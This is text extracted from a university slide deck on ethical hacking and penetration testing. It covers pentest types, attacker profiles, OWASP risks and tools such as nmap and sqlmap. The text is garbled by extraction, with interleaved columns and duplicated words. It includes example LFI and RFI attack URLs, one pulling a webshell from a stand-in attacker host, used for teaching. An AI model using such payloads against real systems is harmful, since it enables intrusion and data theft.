00 - Ethical Hacking and Pentesting
00 - Ethical Hacking and Pentesting
AGENDA
PENETRATION TESTING :DEFINITION & OBJECTIVES & TYPES 01
RED TEAM CYBER VS BLUE TEAM AND BAD PYRAMID 02
RESPONSIBILITIES OF CYBER SECURITY EXPERTS AND ATTACKER PROFILES 03
USE CASE : RED TEAM APT AND WEB PEN TESTING 04
SANS BLUE PRINT FOR PENETRATION TESTING 05
IT CERTIFICATION ROADMAP 06
Penetration testing :DEFINITION & OBJECTIVES
An approach,
modeling tactics of
PEN real-world bad guys, to Finding security
VUL.
find vulnerabilities - vulnerabilities, which
TESTING then under controlled may or may not be ASSESSMENT
circumstances, exploit used to get in or
those vulnerabilities steal data.
and determine
business risk
Purpose
The ultimate goal is discovering flaws so that they can be remediated (applying patches, reconfiguring systems,
altering the architecture, changing processes, etc.).
Types of Penetration Tests
NETWORK
06
WAR DIALING
One of the many avenues of entry/information gain is via remote
access through a dial-up connection to other phone controlled
systems (IVR, DISA etc) The attack method is known as War
SERVICES
finding target systems on a network
01
Dialing and is now being easier to perform due to the explosion
in VOIP services and providers
01
05 SOCIAL
ENGINEERING
Attempts to dupe a user into revealing
sensitive information or clicking on a malicious
06 02
CLIENT-SIDE 02
Designed to find exploit client-side software,
such as browsers, media players, doc editing
link in an email.
programs, etc.
05 03
04 WIRELESS
SECURITY
Targets the physical environment to find
unauthorized wireless access points or
04
WEB
APPLICATION 03
Targets web-based applications in the target
environment
insecure access points.
RED TEAM CYBER VS BLUE TEAM
State sponsored
- Cyberwar, state secret, industrial espionage
- Highly sophisticated
- Unlimited resources
- APT
Hacktivist
- Statement
- Relentless emotionally committed
- Vast networks
- Targeted attacks
Organized Crime
- Economic gain
- Significant technical resources
- Established syndicates
Recreational
- Fame and notoriety
- Limited technical resources
- Known Exploits
Criminal
- Vandalism
- Limited technical capabilities
USE CASE : RED TEAM APT ATTACK LIFECYCLE
PEN TESTING METHODOLOGY
TESTING APPROACHES
A1 Injection
A2 Broken Authentication
1. credential stuffing
2. brute force access
3. session hijacking
The
The Risks
Risks of of Introducing
Introducing a Local
a Local File
File Inclusion
Inclusion Vulnerability
Vulnerability
Broken access control is the problem that emerges when the
https://example.com/?module=/
application doesn’t have etc/passwd
a centralized access control thus
https://example.com/index.php?page=https://attacker.com/uploads/webshell.php
resulting in every complicated scheme that can lead to
developers making mistakes and leaving open vulnerabilities.
Examples:
File Path Traversal
Local File Inclusion LFI
Remote File Inclusion RFI
TOOLS (1/2)
VMWARE WORKSTATION
Run multiple operating systems as virtual machines (including
WPSCAN Linux or Windows VMs) for development and testing
DROOPESCAN
FIREFOX INSPECTOR A plugin-based scanner that aids security
researchers in identifying issues with several
The inspector is used to review and modify the CMSs, mainly Drupal & Silverstripe
HTML and CSS of a web page.
TOOLS (2/2)
EXPLOIT DB NMAP
Exploits, Shellcode, 0days, Remote Exploits, Nmap Free Security Scanner, Port Scanner, & Network Exploration
Local Exploits, Web Apps, Vulnerability Tool.
Reports, Security Articles, Tutorials , …..
.
SQLMAP
sqlmap is an open source penetration testing
tool that automates the process of detecting
and exploiting SQL injection flaws and taking
over of database servers
PYTHON
Python is an interpreted, high-level, general-
DIRBUSTER
purpose programming language. It provides DirBuster is a multi threaded java application
constructs that enable clear programming on designed to brute force directories and files
both small and large scales names on web/application servers.
CYBERSECURITY DAYS OF
GABES UNIVERSITY -2019
CYBERSECURITY DAYS OF
GABES UNIVERSITY -2019
CYBERSECURITY DAYS OF
GABES UNIVERSITY -2019
REPORTING
IT Certification Roadmap